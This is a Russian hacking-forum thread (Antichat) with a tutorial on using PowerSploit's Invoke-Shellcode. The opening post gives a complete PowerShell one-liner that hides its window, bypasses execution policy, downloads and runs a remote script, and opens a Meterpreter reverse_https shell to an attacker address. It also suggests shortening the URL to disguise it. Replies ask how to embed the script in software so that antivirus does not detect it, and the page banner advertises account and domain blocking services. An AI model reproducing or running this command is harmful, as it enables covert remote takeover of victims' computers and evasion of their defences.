PowerShell для хакера (часть I )

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг
PowerShell для хакера (часть I )

Страница 1 из 4

Опции темы

Поиск в этой теме

Опции просмотра

25.11.2016, 00:42

<~DarkNode~>

Новичок

Регистрация: 20.10.2016

Сообщений: 0

С нами: 5033900

Репутация: 0

Часть 1

Следующая часть
Все части

Приветствую Вас колеги. Как Вы уже поняли речь пойдет о знакомствах с базовыми возможностями PowerShell и области применения хакерских техних.
И начнем мы пожалуй сегодня с использования скриптовPowerSploit -( скрипты написанные на PowerShell для пост эксплуатации Windows систем)

Первым примером использования PowerSploit - это будет пример простого и быстрого получения метерпретер сессии на примере скрипта Invoke-Shellcode.ps1

Для начало сходим на гитхаб по ссылке:

Код:

Код:

https://github.com/cheetz/PowerSploit/blob/master/CodeExecution/Invoke--Shellcode.ps1

Жмакним на клавишу RAW - что бы получить ссылку для скачивания в чистом виде

Код:

Код:

https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1

Эту ссылку мы потом используем для нашей команды PowerShell,а пока можно в скрипте в комментариях увидеть опциональные параметры и примеры для его запуска:

Копируем урл нашего скрипта и готовим следующую команду:

Код:

Код:

Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.137.137 -Lport 1337 -Force

Собственно говоря и все)

Запускаем данную команду и к нам прилетает метерпретер сессия)
Можно еще для удобства сократить урл к скрипту на гитхабе через сервисы сокращения ссылок)

Всем спасибо) Продолжения следует)

Следующая часть
Все части

𝕏 Twitter Reddit Telegram Копировать ссылку

25.11.2016, 18:41

kot-gor

Новичок

Регистрация: 07.09.2016

Сообщений: 0

С нами: 5095710

Репутация: 0

добрый вечер.а если данный скрипт допустим встроить в софт, как с детектом антивирусов у его?

25.11.2016, 20:04

Vander

Новичок

Регистрация: 03.11.2010

Сообщений: 5

С нами: 8170166

Репутация: 0

Цитата:

kot-gor сказал(а):

добрый вечер.а если данный скрипт допустим встроить в софт, как с детектом антивирусов у его?

Присоединяюсь к вопросу...

25.11.2016, 20:14

<~DarkNode~>

Новичок

Регистрация: 20.10.2016

Сообщений: 0

С нами: 5033900

Репутация: 0

Завтра сделаю тест на детект.Сорри сегодня не успеваю)

26.11.2016, 23:12

pappa

Новичок

Регистрация: 23.09.2016

Сообщений: 0

С нами: 5071741

Репутация: 0

я полагаю если удаленно создать правило в исключениях фаервола то получится или я опять не права ?

27.11.2016, 00:14

kot-gor

Новичок

Регистрация: 07.09.2016

Сообщений: 0

С нами: 5095710

Репутация: 0

Цитата:

pappa сказал(а):

я полагаю если удаленно создать правило в исключениях фаервола то получится или я опять не права ?

не обязательно...

29.11.2016, 10:28

ipmann

Новичок

Регистрация: 28.11.2016

Сообщений: 0

С нами: 4977117

Репутация: 0

Symantec Endpoint Protection 12 этот скрипт прибивает..

29.11.2016, 16:34

kot-gor

Новичок

Регистрация: 07.09.2016

Сообщений: 0

С нами: 5095710

Репутация: 0

Добрый день, ну не во всех же стоит Symantec Endpoint Protection,какие то скрипты будут пробиваться..)

03.12.2016, 01:46

<~DarkNode~>

Новичок

Регистрация: 20.10.2016

Сообщений: 0

С нами: 5033900

Репутация: 0

Цитата:

~~DarkNode~~ сказал(а):

Завтра сделаю тест на детект.Сорри сегодня не успеваю)

Извините за редкий онлайн. Увлекся лабораторией тестирования на проникновения от PentestIT. После окончания прохождения вернусь к вам мои дорогие друзья)))